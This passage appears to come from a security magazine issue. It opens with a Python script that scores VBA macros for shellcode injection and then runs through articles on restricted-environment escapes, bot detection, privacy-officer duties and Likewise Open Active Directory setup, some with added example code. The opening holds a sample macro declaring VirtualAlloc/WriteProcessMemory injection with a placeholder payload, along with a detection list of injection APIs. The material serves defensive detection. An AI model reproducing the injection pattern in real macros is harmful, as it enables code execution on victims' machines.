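    'ByRef lpNumberOfBytesWritten As Long) As Long\n'
    "\n"
    "Private Sub ExecuteShellCode()\n"
    "    Dim lpMemory As Long\n"
    "    Dim strShellCode As String\n"
    "    Dim iResult As Long\n"
    f'    strShellCode = "{_FAKE_PAYLOAD}"\n'
    "End Sub\n"
)

BENIGN_VBA = (
    "Sub FormatReport()\n"
    '    Range("A1").Font.Bold = True\n'
    "End Sub\n"
)

# Win32 calls whose declaration in a document macro is the signature of the
# technique: memory allocated and written inside the Office process, or a DLL
# dropped to a temporary file and loaded. CreateThread is an assumption here.
RISKY_APIS = {
    "VirtualAlloc": "allocates memory inside the Office process",
    "WriteProcessMemory": "writes a decoded payload into process memory",
    "CreateThread": "runs injected code without creating a new process",
    "LoadLibrary": "loads a DLL the macro dropped to disk",
    "FreeLibrary": "unloads the DLL once it has run",
    "DeleteFile": "removes the dropped DLL afterwards",
}

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)
# A quoted run of 60+ base64 characters: long enough to skip ordinary string
# literals, short enough to catch a payload split across many lines.
B64_RE = re.compile(r'"([A-Za-z0-9+/]{60,}={0,2})"')


def find_declares(vba):
    """Return [(api_name, library)] for each Declare naming a risky API.
    The Alias name wins over the VBA-side name; A/W suffixes are ignored so
    LoadLibraryA and LoadLibraryW both match LoadLibrary."""
    found = []
    for name, lib, alias in DECLARE_RE.findall(vba):
        real = alias or name
        base = re.sub(r"[AW]$", "", real)
        if any(base.startswith(api) for api in RISKY_APIS):
            found.append((real, lib.lower()))
    return found


def find_blobs(vba):
    """Return [(kind, decoded_length)] for long base64 literals; 'pe' means
    the decoded bytes start with the MZ signature of an embedded DLL/EXE."""
    blobs = []
    for literal in B64_RE.findall(vba):
        try:
            raw = base64.b64decode(literal, validate=True)
        except (ValueError, binascii.Error):
            continue
        blobs.append(("pe" if raw.startswith(b"MZ") else "blob", len(raw)))
    return blobs


def assess(vba):
    """Combine both signals into a verdict a triage queue can sort on."""
    apis = find_declares(vba)
    blobs = find_blobs(vba)
    names = {re.sub(r"[AW]$", "", a) for a, _ in apis}
    injects = bool(names & {"VirtualAlloc", "WriteProcessMemory", "CreateThread"})
    if injects and blobs:
        verdict = "high"      # payload present plus the means to run it in-process
    elif apis or blobs:
        verdict = "medium"    # one half of the pattern; worth a manual look
    else:
        verdict = "low"
    return {"verdict": verdict, "apis": apis, "blobs": blobs}
```

Run it over VBA source extracted from a document (olevba or a similar tool) and sort by verdict: a "high" hit is a macro that carries both the payload and the means to run it without a new process, which is exactly the case an executable whitelist alone does not see.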



Conclusion 

These exercises show clearly that it is possi- 
ble to execute arbitrary code in a restricted 
environment. Naturally this arbitrary code 
runs under the LUA user and has no adminis- 
trative rights. To obtain administrative rights, it 
has to exploit a privilege escalation vulnerabil- 
ity (like KiTrap0D) or find and exploit a mis- 
configuration of the restricted environment. 

Is this an issue for the restricted environments 
you're managing? Probably not, as the main 
goal of restricted corporate environments is to 
limit helpdesk support costs caused by inap- 
propriate changes to the environment. But if 
you provide a restricted environment to the 
Internet population, you must be aware that it 
will be abused. 



Didier Stevens (CISSP, GSSP-C, MCSD .NET, MCSE/Security, RHCT, OSWP) is an IT Security Consultant 
currently working at a large Belgian financial corporation. He is employed by Contraste Europe NV, an IT Con- 
sulting Services company (www.contraste.com). You can find his open source security tools on his IT security 
related blog at blog.DidierStevens.com. 
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security spotlight 



Here are some of the Twitter feeds we follow closely and can recommend to anyone interested in 
learning more about security as well as engaging in interesting conversations on the subject. 

If you want to suggest an account to be added to this list, send a message to @helpnetsecurity 
on Twitter. Our favorites for this issue are: 

@jaysonstreet 

Jayson E. Street - Chief Infosec Officer at Stratagem 1 Solutions. 
http://twitter.com/jaysonstreet 

@stacythayer 

Stacy Thayer - Founder and Executive Director of SOURCE Conference. 
http://twitter.com/stacythayer 

@Beaker 

Christofer Hoff - Director, Cloud & Virtualization Solutions at Cisco. 
http://twitter.com/Beaker 

@humanhacker 

Chris Hadnagy - Developer of the social engineering framework. 
http://twitter.com/humanhacker 



@hypatiadotca 

Leigh Honeywell - NSSLabs analyst and security consultant. 
http://twitter.com/hypatiadotca 
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Affordable Strong Authentication for your Enterprise 

Entrust IdentityGuard 



Versatile. Affordable. Easy to use. Entrust's strong authentication solution offers the 
widest range of authenticators on the market today — all from a single platform. 
Affordable enough to deploy across your entire enterprise, yet flexible enough for 
your unique requirements. Trusted by over 2000 organizations spanning 60 countries. 

For a one-on-one demonstration of the benefits of our strong authentication solutions, 
visit Entrust today. 

www.entrust.com • 1-888-690-2424 • entrust@entrust.com 
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Automated robotic malware. We in the industry call them "bots" and they are 
an absolute blight to the online experience. Bots perpetrate fraud, steal con- 
tent, destroy data, generate spam and generally wreak havoc on the sites they 
attack. IT professionals are left to pick up the pieces following these attacks, 
often with little success and great frustration. It's time that IT put the burden 
on the bot, forcing them to work harder to infiltrate websites and breach secu- 
rity. As it stands, bots are ahead in the race, always being chased by IT pro- 
fessionals after the damage is already done. New ways of combating bots that 
are available today are perfectly capable of shifting the burden to the bot. 



Hitting the BOT-tom line 

Fraudulent activity conducted by bots is sig- 
nificantly impacting many organizations. So- 
cial networking sites, popular blogs, career 
sites, search engines, webmail providers and 
others with dynamic functionality are all 
targets. 

Bots can be extremely sophisticated, overtaking thousands of computers to generate a few 
fraudulent activities per machine and completing their mission undetected after creating 
tens of thousands of fraudulent transactions over a span of 24 or 48 hours. The sleekest 
bots go undetected, the timing of their attack never even realized, but the aftermath 
evident in the volume of fraudulent accounts created, spam delivered, and content scraped. 

All of the clean-up efforts divert money and 
resources from core business activities, caus- 
ing devastating financial losses to these 
companies. 
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Wrecking the online experience 

Not only do bots frustrate website owners and 
the IT professionals that manage them, but 
they also disrupt the online experience of le- 
gitimate website visitors. CAPTCHAs are by 
far the most prevalent technology used on 
websites today to prevent bots from entering. 
In addition to being increasingly ineffective at 
blocking bots, CAPTCHAs also frustrate 
legitimate users to the site. 

An estimated 3 to 10% of human visitors pre- 
sented with a CAPTCHA will simply abandon 
the transaction. With no interest in completing 
an additional registration step of deciphering 
distorted letter combinations, some customers 
simply refuse to suffer through this security 
screening. Website owners, in turn, suffer 
from the loss of legitimate customers, traffic, 
and revenue. 

Other systems like keylogging have largely 
been abandoned due to privacy concerns. 
Reputation systems log activities by originat- 
ing IP address, flag specific hardware as dan- 
gerous, and subsequently block those IP ad- 
dresses from interacting with the site. This 
method is effective for blocking bots, but un- 
fortunately shuts out legitimate users as well. 
With more than 150 million computers in- 
fected with automated robotic malware, the 
hardware generating the harmful bots is the 
very same hardware used by customers. 
Blocking the bots means blocking customers 
too. 

Burdening internal resources 

Zero-day vulnerability is a term used to de- 
scribe the situation that arises when a brand- 
new, never-before-seen vulnerability is dis- 
covered. The issue is new and it is free to 
cause damage until security professionals 
have an opportunity to respond with a 
counteractive measure. 

CAPTCHA is an aging technology that has not 
kept pace with bots. Most web property own- 
ers are always reacting to bots and the dam- 
age they cause. There are three widely used 
approaches for dealing with automated proc- 
esses - all of them inflicting pain on someone 
other than the bot. 



The chaser 

The chaser is the unfortunate IT professional 
assigned to web logging - evaluating in real- 
time the IP addresses visiting the site - and 
trying to determine which visitors are auto- 
mated versus human. 

By the time this unfortunate soul is able to 
identify suspicious, bot-like behavior, track the 
IP address and do something about it, the bot 
is already gone. The chaser is largely ineffec- 
tive and extremely frustrated. 

The cleaner 

Some customer-centric website owners re- 
fuse to use CAPTCHAs, no matter the suffer- 
ing caused by bots. These companies assign 
resources specifically to "undo" the damage 
done by the bots. Whether that means delet- 
ing fraudulent registrations, erasing spam-like 
posts from the website's blog, or investigating 
the placement of stolen content, internal re- 
sources "clean up" the damage done by bots. 

This generates significant expense to the 
company and is a completely reactive ap- 
proach. As a side note: due to the ineffective- 
ness of CAPTCHAs, even sites that employ 
them must conduct these "cleaning" activities. 

The martyr 

The martyr is willing to defile its own website 
in an effort to block bots. Usually a CAPTCHA 
user, the martyr bears the costs of brand 
damage and lost customers on the front-end. 
Consider this example: a website that re- 
ceives 100 registrations per day, loses 10 reg- 
istrations because customers are unwilling to 
decipher a CAPTCHA. 

The company knows that their cost is $7 per 
lead. That CAPTCHA just cost the company 
$70 in a single day - without mentioning the 
money that must be spent after the fact due to 
the increasing percentage of bots that is able 
to overcome CAPTCHAs and commit fraud on 
the site. 

This is a case of letting the bots in and keep- 
ing the humans out. 
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Shifting the burden: Putting bots on the 
defensive 

The problem with CAPTCHAs, reputation sys- 
tems, and other CAPTCHA-replacement solu- 
tions is that they fail to challenge the bots. 

Common to all of these solutions is the fact 
that the burden is placed on the human user. 
Reputation systems conduct a historic analy- 
sis, blocking bots only once they have 
continually committed fraud on the site. 

CAPTCHA systems burden human visitors, 
forcing them to prove they are human to gain 
access. CAPTCHA-replacement options such 
as simple math problems and queries also 
place demands on legitimate users. None of 
these solutions challenges bots. A new 
approach is required. 

The newest technologies place the burden on 
the bots who have to prove they are human. 
Rather than blocking everyone and whitelist- 
ing humans, new technologies are invisible to 
users and effectively detect and block bots. 

Behavior profile 

Bots behave in ways that are easily distin- 
guishable from humans. So why do bot block- 
ing technologies fail to analyze a complete 
profile of bot behavior? 

Timing algorithms and keylogging technolo- 
gies come the closest, monitoring natural 
pauses and variable rate of use of the key- 
board and mouse. However, these systems 
are invasive and fail to analyze multiple vari- 
ables that distinguish human and automated 
behavior. 

Technologies that challenge bots with analysis 
of a complete profile of behaviors are much 
more likely to successfully identify them. With 
technology advancements, bots can be easily 
programmed to mimic the particular behavior 
testing in a single-variable analysis. However, 
if bots were to be evaluated on a series of behaviors, it would create a much more 
challenging environment for botnet operators. 

Random variation 

Much like students who know the teacher 
uses the same test year after year, bots have 
a knack for "working the system." The older 
students pass down the previous years' test 
and new students simply memorize the an- 
swers in order to ace the test. Botnet opera- 
tors can easily "learn" a test that is presented 
over and over in exactly the same order. 

Random variation in the order of testing ques- 
tions can make bot-blocking technologies 
vastly more effective. Additional knowledge 
and effort is required, decreasing the bots' ef- 
fectiveness. 
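Here is what a multi-variable behaviour profile looks like in code, as an added example that is neither Pramana's product nor any code from the article. The session fields, thresholds and the three sample sessions are constructed for the illustration; the point is that a bot tuned to pass one check (it waits before submitting) still fails when form timing, keystroke variation, mouse activity, script execution and per-IP volume are scored together.

```python
from dataclasses import dataclass, field
from statistics import pstdev


@dataclass
class Session:
    """Signals a web front end can collect for one registration attempt.
    Field names and units are constructed for this example."""
    ip: str
    fill_seconds: float                              # page load to form submit
    key_gaps_ms: list = field(default_factory=list)  # gaps between keystrokes
    mouse_events: int = 0                            # mouse moves/clicks before submit
    ran_javascript: bool = True                      # client executed the page script
    signups_from_ip_24h: int = 1                     # registrations from this IP in 24h


def _clamp(x):
    return max(0.0, min(1.0, x))


def signal_scores(s):
    """Score each behaviour independently: 0.0 human-like .. 1.0 bot-like.
    Thresholds are illustrative assumptions, not measured values."""
    if len(s.key_gaps_ms) < 2:
        keys = 1.0                                  # nothing typed: fields filled at once
    else:
        sd = pstdev(s.key_gaps_ms)                  # humans vary, scripts are metronomic
        keys = _clamp((80.0 - sd) / 75.0)
    return {
        "fill_time": _clamp((20.0 - s.fill_seconds) / 18.0),  # under 2 s is max suspicion
        "keystrokes": keys,
        "mouse": 0.0 if s.mouse_events else 1.0,
        "javascript": 0.0 if s.ran_javascript else 1.0,
        "ip_volume": _clamp(s.signups_from_ip_24h / 50.0),
    }


def single_signal_verdict(s, threshold=0.5):
    """The single-variable test the text warns about: form fill time only."""
    return "bot" if signal_scores(s)["fill_time"] > threshold else "human"


def profile_verdict(s, threshold=0.5):
    """Average over the whole profile; returns (verdict, score)."""
    scores = signal_scores(s)
    score = round(sum(scores.values()) / len(scores), 3)
    return ("bot" if score > threshold else "human"), score


# Constructed sessions: a person, a naive bot, and a bot that waits before
# submitting so that a fill-time-only check lets it through.
HUMAN = Session("203.0.113.10", 45.0, [120, 340, 90, 510, 200, 160], mouse_events=37)
NAIVE_BOT = Session("198.51.100.7", 0.8, [], 0, ran_javascript=False, signups_from_ip_24h=400)
SLOW_BOT = Session("198.51.100.9", 30.0, [100] * 8, 0, signups_from_ip_24h=60)
```

Each signal on its own can be mimicked; the slow bot beats the fill-time check but still scores 0.6 on the profile because it never moved the mouse, typed at a fixed cadence and shares its IP with dozens of other sign-ups. Adding signals, or rotating which ones are weighted, raises the cost for the operator without any change visible to the human visitor.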

Customer options 

Once a bot has been identified, the most ef- 
fective systems will allow web property own- 
ers to deal with them in a variety of ways. 
Some owners will prefer to block them out- 
right. Others may wish to pose an additional 
test for verification to make absolutely sure 
that the visitor is not human. It is also possible 
to redirect the bot to a database of false data, 
allowing the bot to continue operating as 
programmed, but with sample data. 

The botnet operator believes the bot is con- 
tinuing to work as instructed, while there's no 
impact from fraudulent activity. 

These simple criteria for combating bots chal- 
lenge botnets and their operators, putting bots 
on the defensive rather than letting them 
wreak havoc and disrupt the activity of human 
visitors, web site owners, and IT professionals 
alike. 

Given that this problem leads to an estimated 
151 billion spam messages a day, billions of 
dollars in wasted resources, and the lessen- 
ing of profitability of legitimate companies, 
isn't it time to try a new approach? 



David Crowder is CEO of Pramana (www.pramana.com), an Internet fraud protection company specializing in 
bot detection and elimination software. You can contact David at david@pramana.com. 
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

The expanding role of the IT security professional 

by Rick Kam 

You have a meeting with your IT Executive. You learn that you are now desig- 
nated as the company's "privacy officer," a newly created role with few pa- 
rameters and little direct budget or authority. Yet this position also comes with 
high expectations and responsibilities, and a laundry list of worries. You are 
now responsible for maintaining the privacy of your customers' and your pa- 
tients' personally identifiable information (PII) and protected health informa- 
tion (PHI). You take a deep breath. If it makes you feel any better, you are not 
alone. 



We've noticed that the Chief Information Secu- 
rity Officer (CISO) or IT security function is in- 
creasingly taking responsibility to deal with 
risks, and associated management of data 
breach incidents. This creates an interde- 
pendent relationship for the CISO with the 
Chief Privacy Officer (CPO) and the privacy 
function. 

In many healthcare organizations, the IT security professional is thrust into the privacy 
role as companies begin to sort out their obligations to the growing federal and state 
level privacy legislation. Navigating through this maze can be both challenging and 
rewarding. 

Your success in your new role depends on 
how well you can identify and quantify your 
company's gaps in compliance to privacy 
regulations, actual risk of privacy breach inci- 
dents, and putting a plan in place and the 
necessary resources to mitigate these risks. 
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Technology is not a "silver bullet" for 
privacy compliance 

Hardly a day goes by without news of some 
type of data breach being reported. Data 
breach incidents are growing in frequency and 
severity while regulatory requirements for 
data privacy protection and incident notifica- 
tion are becoming more stringent. Although 
organizations entrusted with PII and PHI are 
making investments in technologies such as 
encryption and data loss prevention (DLP), 
none of these are "silver bullets" that will 
eliminate data breach risks. Despite the focus 
on failure or lack of adequate security controls 
within organizations, a far more significant and 
common portion of these events are simply 
the result of staff's lack of awareness and/or 
compliance to internal security policies and lax 
practices to safeguard sensitive information. 

Risk factors and overlooked risks 

I will explore the various risk factors that corre- 
late to data breach incidents and associated 
organizational implications. I will also help 
identify areas on which information security 
and privacy professionals should focus their 
efforts in order to address the most prevalent, 
and often overlooked risks. 

Years of experience have taught us that the 
most common causes of data breach incidents 
resulting from unintentional failure of privacy 
and security practices/policies include: 

1. Failure to terminate or modify both physical 
and/or network access levels when staff is 
transferred or terminated. 

2. Misdirected email messages or faxes to un- 
authorized recipient(s). 

3. Billing department mistakes when billing 
statements are sent to the wrong customers/ 
patients. 

4. Digital copy machines storing document 
images containing highly sensitive customer 
or patient data that is not encrypted or 
cleared. 

5. Improper disposal of paper records. 

6. Theft or loss of laptops, tapes, or portable 
devices. 

7. Physical security staff communicating sensitive information over an unsecured channel. 

While IT security technologies such as intrusion detection, anti-virus, encryption and data 
loss prevention are all helpful and often necessary tools, these tools cannot prevent the 
vast majority of breach incidents that are daily occurrences across organizations including 
healthcare, financial, and government agencies, where most breach incidents are occurring. 
The reason for this mismatch is that many of the technical controls assume malicious 
intent, yet most of the incidents are unintentional breaches of company security and 
privacy policies and practices. 

In the healthcare industry, for example, all of 
the above events may constitute data breach 
incidents with some of these events having 
severe internal and external implications for 
the organization. The American Recovery and 
Reinvestment Act of 2009 (ARRA), through its 
included Healthcare Information Technology 
for Economical and Clinical Health (HITECH) 
Act, amended HIPAA with requirements for 
healthcare organization to have documented 
policies and procedures, assigned responsi- 
bilities for privacy and security, ongoing train- 
ing for staff, a risk assessment for each inci- 
dent, and notification of victims as well as the 
department of Health and Human Services 
(HHS) based on the result of the risk assess- 
ment. These requirements became effective 
last year, on February 18, 2010. 

As required by section 13402(e)(4) of the HI- 
TECH Act, the Secretary must post a list of 
breaches of unsecured protected health in- 
formation that affects 500 or more individuals. 
The HHS started listing the breaches on its 
website in February 2010, then updated the 
list in April 2010. The data shows that more 
than 1.2 million individuals were affected - 
based on information on 64 incidents. The way 
that HHS categorizes some incidents can at 
times make it difficult to tell the difference be- 
tween failures of technology as opposed to 
process. About 69% of the incidents are clas- 
sified as "Theft/Loss" and we can see with 
reasonable certainty that 30% of the incidents 
were process related. 

Risk assessments are effective for 
organizations 

Our experience shows that a significant por- 
tion of data breach incidents are managed by 
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our clients' IT organization where privacy and 
security are combined. For us, this often in- 
volves working with the client's IT manage- 
ment, staff, and counsel to remediate the 
situation. As far as our healthcare customers 
are concerned, a big new challenge is the re- 
quirement to comply with the HITECH Act's risk 
assessment. We conducted a survey and 
found that all of the respondents indicated that 
they are spending at least 50% more time in- 
vestigating and performing risk assessments 
on data breach incidents since the HITECH 
Act became effective. This is putting signifi- 
cant strain on the IT organization to meet 
compliance requirements. 

We recommend to organizations to consider 
the following questions in order to get a better 
sense of their privacy program risk and 
maturity: 

• Corporate Governance - Does the organi- 
zation have clear accountability and visibility 
from the boardroom to frontline privacy opera- 
tions? 

• Privacy and Security Office Operations - Does the privacy office develop, implement, 
and monitor organizational processes that address all facets of confidentiality and 
customer/patient, and employee/staff privacy? 

• Resource Allocation - Has the privacy and 
security office identified and prioritized the re- 
sources and budget necessary to maintain the 
privacy and security of the organization's per- 
sonal and sensitive information? 

• Management Reporting - Does the privacy 
and security office maintain a system of man- 
agement reporting that provides the organiza- 
tion with timely and relevant information in all 
areas of privacy risks and effectiveness? 

Practical implications for privacy best 
practices 

Security and privacy professionals face a daunting challenge with the evolving threat 
vectors and the changing regulatory landscape. For those with deep knowledge and 
awareness of these forces and the ability to manage them, there are significant career 
rewards and opportunities. 

As you review your overall data breach risk 
and compliance environment, here are some 
suggested best practices to consider. We have 
found that many organizations are lacking 
some or most of these practices, which makes 
them highly vulnerable. These practices can 
be performed internally and/or using external 
resources: 

• Keep track of a myriad of federal and state 
level laws and regulations concerning 
customer/patient and staff privacy. 

• Conduct annual privacy and security risk as- 
sessment and quantify and communicate the 
risks from an overall business perspective. 

• Implement staff training and awareness pro- 
grams. 

• Communicate with third parties and partners 
and verify privacy policy compliance. 

• Develop an incident response plan and des- 
ignate a cross-functional response team. 

• Implement a breach incident risk assessment 
process that is consistent, efficient, and pro- 
vides sufficient guidance to meet regulatory 
requirements and approval from counsel. 

• Measure, track, and communicate key pri- 
vacy and security program performance 
metrics and risks. 

The good news for IT professionals responsi- 
ble for security and privacy initiatives is that 
organizations are becoming more educated 
and sensitized to the business risks posed by 
data breach incidents. 

There is a growing number of external re- 
sources available that can help organizations 
identify specific privacy-related threat vectors 
and best practices to reduce the risks. Lever- 
aging internal and external data and resources 
to guide your IT investment for maximum im- 
pact is possible today. Simply enhancing your 
speed of patching may only get you a 2% re- 
duction in risk. 



Rick Kam is President and Founder of ID Experts (www.idexpertscorp.com). The company has managed hun- 
dreds of data breach incidents for healthcare organizations, corporations, financial institutions, universities and 
government agencies. He is an expert in privacy and information security. His experience is leading organiza- 
tions in policy and solutions to address protecting PHI/PII and remediating privacy incidents and identity theft. 
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Gartner Security & Risk Management Summit 2010 

22 - 23 September 2010 | Park Plaza Westminster Bridge, London, UK 
europe.gartner.com/security 

Information Security • Data Loss Prevention • Governance • Risk Management • Identity & Access Management 

Embrace Your Challenges in Security and Business in 2010: The Year We Make Contact 

The Gartner Security & Risk Management Summit will give you the information you need to 
create a layered approach combining risk management and compliance, secure business 
enablement and infrastructure protection. Hear the latest analysis revealing market trends, 
opportunities and threats to you and your company. 

Benefits of Attending 

• Understand emerging threats and your best defenses 
• Sharpen your security strategy and tighten your tactics 
• Sharpen the way you communicate security to the business 
• Integrate security in all processes and applications 
• Drive down the cost of compliance while harvesting the benefits 
• Better manage all kinds of risk 

Summit Co-chairs: Carsten Casper, Research VP, Gartner; Tom Scholtz, Research VP, Gartner 

View the full agenda online at europe.gartner.com/security 

Agenda Tracks 

Track 1: Protecting Your Infrastructure and Managing Your Identities 
Track 2: Good Governance Enables and Needs Good Risk Management 
Track 3: A Strategic Vision for Security and Risk Management Leaders 

Early Bird Savings: Register by 23 July 2010 and save €300 

Register Now: europe.gartner.com/security 
Tel: +44 208 879 2430 
Email: emea.registration@gartner.com 



If your environment consists of mixed operating systems, it is important to 
deploy authentication mechanisms that will work on any system, against a 
central point, and securely. This allows for proper auditing and accounting for 
compliance and administration. Using Likewise Open (www.likewise.com), 
you can authenticate and authorize users on Linux, UNIX, and Mac OS X 
through Microsoft's Active Directory. Some of the benefits are a single user- 
name and password for users, improved security, and granular account man- 
agement. Likewise Open is provided under the terms of the GNU General Pub- 
lic License and the GNU Library General Public License. 



The following article will describe how to deploy Likewise Open on Ubuntu 9.10 Server 
Edition, but can also be followed for deployment on other Linux and UNIX operating 
systems. 

You will need to make sure your Active Directory configuration supports Simple 
Authentication and Security Layer (SASL) mechanisms. To do so, run the following query 
(you will need ldap-utils to do it): 



root@ubuntu:/tmp# ldapsearch -H ldap://winserver2008.mydomain.com -s base -LLL supportedSASLMechanisms -x 
dn: 
supportedSASLMechanisms: GSSAPI 
supportedSASLMechanisms: GSS-SPNEGO 
supportedSASLMechanisms: EXTERNAL 
supportedSASLMechanisms: DIGEST-MD5 
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Four SASL mechanisms are supported. SASL 
is a framework for providing authentication 
and data security services in connection- 
oriented protocols. The dominant GSSAPI 
mechanism implementation in use today is 
Kerberos, which is an integral part of Win- 
dows 2000 Active Directory implementations. 



Kerberos will provide authentication and 
strong cryptography over the network. 
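As an added example (not part of the article or of Likewise Open), the script below parses the ldapsearch answer above the way a pre-deployment check would, handling the line folding and base64 ("::") value forms that real LDIF output can contain, and reports whether a Kerberos-backed mechanism is on offer. The sample text is a constructed copy of the rootDSE answer shown above; the set of mechanisms treated as legacy is an assumption of this example.

```python
import base64

# Constructed sample: the rootDSE answer shown above, as ldapsearch -LLL prints
# it. On a real domain controller feed in the output of:
#   ldapsearch -H ldap://<dc> -s base -LLL supportedSASLMechanisms -x
SAMPLE_LDIF = """dn:
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
"""

# Mechanisms that give Kerberos-backed authentication (what Likewise Open uses)
# versus ones that carry a password or a weak digest of it. The legacy set is
# an assumption made for this example.
KERBEROS_MECHS = {"GSSAPI", "GSS-SPNEGO"}
LEGACY_MECHS = {"DIGEST-MD5", "CRAM-MD5", "PLAIN", "LOGIN"}


def parse_ldif_entry(text):
    """Parse one LDIF entry into {attribute: [values]}.
    Handles continuation lines (leading space) and base64 values ("attr:: ...")."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]          # folded continuation of the previous line
        elif line.strip() and not line.startswith("#"):
            unfolded.append(line)
    attrs = {}
    for line in unfolded:
        name, _, value = line.partition(":")
        if value.startswith(":"):             # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        attrs.setdefault(name.strip(), []).append(value)
    return attrs


def sasl_mechanisms(text):
    """Advertised SASL mechanisms, in the order the server listed them."""
    return parse_ldif_entry(text).get("supportedSASLMechanisms", [])


def assess(text):
    """Is Kerberos available, and which legacy mechanisms does the DC still
    advertise? The second is worth knowing for any LDAP client that is not
    pinned to GSSAPI."""
    mechs = set(sasl_mechanisms(text))
    return {
        "kerberos_ready": bool(mechs & KERBEROS_MECHS),
        "legacy_advertised": sorted(mechs & LEGACY_MECHS),
        "mechanisms": sorted(mechs),
    }
```

Pipe real output in with `assess(sys.stdin.read())`; a domain controller that does not advertise GSSAPI is not ready for the Kerberos-based join described below, whatever else it lists.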

Get the latest version of Likewise Open from 
www.likewise.com, move the installer file to a 
temporary directory and make it executable. 
The installation requires you to be logged in 
with a super user account. 



cd /tmp 
wget http://www.likewise.com/YourOperatingSystemsCurrentRelease 
chmod 555 LikewiseIdentityServiceOpen-5.3.0.7766-linux-i386-deb.sh 

Run /tmp/LikewiseIdentityServiceOpen-5.3.0.7766-linux-i386-deb.sh to install. 



Follow the prompts to accept the licensing 
agreement and the default installation options. 

Configuring Likewise Open 

The Installation and Administration Guide 
Likewise provides on their website is very 
thorough and I recommend reading it at some 
point so that you might fully understand each 
component. 

The options I chose for my setup have proved to be secure, yet easy on the users. The 
configuration file is located at /etc/likewise/lsassd.conf. Each section of the 
configuration file I have modified is described below. Section headings are in bold 
text, followed by the option chosen and an explanation. 

[pam] 

log-level = info 

You have the option of controlling the verbos- 
ity of logging. I would recommend setting this 
to informational if your log server can handle 
the traffic. Take some time to review the logs 
to find out what your organization needs for 
auditing and compliance, and then adjust the 
log level accordingly. 

display-motd = yes 

Every organization should have an Accept- 
able Use Policy (AUP) for computer systems. 
In cases where there isn't one or when you 
want to remind users of what that policy is, 
you can utilize a Linux server's message of 
the day at log on. You can change it to any- 
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thing from a short legal statement to your full 
AUP for Linux servers or workstations. How 
the MOTD is displayed may differ across 
systems. 

user-not-allowed-error = Access denied. Wrong username or password. 

If authentication fails, it is important to let the 
users know. It is confusing when you try to log 
into a system and you don't know why you are 
being denied access. You can even add a 
support phone number or e-mail address. 

[auth provider:lsa-activedirectory-provider] 

login-shell-template = /bin/bash 

The login shell is something particular to indi- 
vidual needs or preferences. Once users are 
logged in, they can type the name of the shell 
they want, provided that shell is available. 

homedir-template = /home/%U 

The default template is %H/local/%D/%U, which sets the home directory path to 
/home/local/domain/username. The default directory for users in Linux is 
/home/username. If the servers you are deploying Likewise Open on have already been 
in production, then users are already used to logging in and getting the 
/home/username directory path. This also prevents you from having to transfer any 
files from /home/username to /home/local/domain/username. 

ldap-sign-and-seal = true 



Unless you have a need for plaintext LDAP 
traffic, I would suggest leaving signing and 
sealing on all the time. The authentication it- 
self is not plaintext since you are using Kerbe- 
ros. It is just the actual LDAP request and re- 
sponse data that is plaintext, unless you use 
sealing which uses LDAP over SSL (LDAPS). 
To enable LDAPS, a valid certificate must be 
installed on the Domain Controller. 

assume-default-domain = yes 

Un-comment this option so that users do not 
have to type in the domain name before their 
username, such as login: mydomain\user- 
name. Leave this option commented out if 
multiple domains are in use. 

require-membership-of = UnixLinux 



This option restricts access only to authorized 
groups and users. You will need to create a 
user group of which people can be members 
of on the Domain Controller. You can also add 
user accounts to the require-membership-of 
option, but I would recommend not doing this 
to minimize administration overhead. It may 
be required to create different groups for 
specific servers to further limit access. 

[auth provider:lsa-local-provider] 

Use the same settings configured in the pre- 
vious section for duplicate entries such as the 
login shell and home directory template. 

After changing the settings in lsassd.conf, you must force the Likewise agent to 
refresh by executing the following command with super-user privileges: 
/opt/likewise/bin/lw-refresh-configuration. 



root@ubuntu:/# /opt/likewise/bin/lw-refresh-configuration 
Configuration successfully loaded from disk. 
root@ubuntu:/# 
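To check a deployed lsassd.conf against the settings recommended above, here is an added lint example (not part of Likewise Open). The two configuration fragments are constructed: the first switches the settings from this article to their permissive values, the second matches the options chosen above. Reading the file with configparser rests on the INI-style layout the article shows ([section] headings, key = value lines), which is an assumption made here.

```python
import configparser

# Constructed lsassd.conf fragments for the example; neither is a file
# shipped by Likewise. The first is the weak form, the second the hardened one.
WEAK_CONF = """
[pam]
log-level = error
#display-motd = yes
user-not-allowed-error = Access denied. Wrong username or password.

[auth provider:lsa-activedirectory-provider]
login-shell-template = /bin/bash
homedir-template = %H/local/%D/%U
ldap-sign-and-seal = false
#assume-default-domain = yes
#require-membership-of = UnixLinux
"""

HARDENED_CONF = """
[pam]
log-level = info
display-motd = yes
user-not-allowed-error = Access denied. Wrong username or password.

[auth provider:lsa-activedirectory-provider]
login-shell-template = /bin/bash
homedir-template = /home/%U
ldap-sign-and-seal = true
assume-default-domain = yes
require-membership-of = UnixLinux
"""

AD_SECTION = "auth provider:lsa-activedirectory-provider"


def load_conf(text):
    # interpolation=None: %U and %H in homedir-template are Likewise
    # placeholders, not configparser interpolation syntax.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def lint_lsassd(text):
    """Return [(severity, message)] for settings that diverge from the
    configuration described in this article. Commented-out lines count as
    unset, which is how the agent treats them too."""
    cp = load_conf(text)
    ad = cp[AD_SECTION] if cp.has_section(AD_SECTION) else {}
    pam = cp["pam"] if cp.has_section("pam") else {}
    findings = []
    if ad.get("ldap-sign-and-seal", "").strip().lower() != "true":
        findings.append(("WEAK", "ldap-sign-and-seal is not true: LDAP request and "
                                 "response data crosses the network unsigned and unsealed"))
    if not ad.get("require-membership-of", "").strip():
        findings.append(("WEAK", "require-membership-of is unset or commented out: "
                                 "every domain account may log in"))
    if pam.get("display-motd", "").strip().lower() != "yes":
        findings.append(("WARN", "display-motd is not yes: the AUP banner is not shown"))
    if pam.get("log-level", "").strip().lower() != "info":
        findings.append(("WARN", "log-level is not info: authentication events may be "
                                 "missing from the audit trail"))
    return findings


def weak_count(text):
    """Number of WEAK findings; non-zero means the host should not go live."""
    return sum(1 for sev, _ in lint_lsassd(text) if sev == "WEAK")
```

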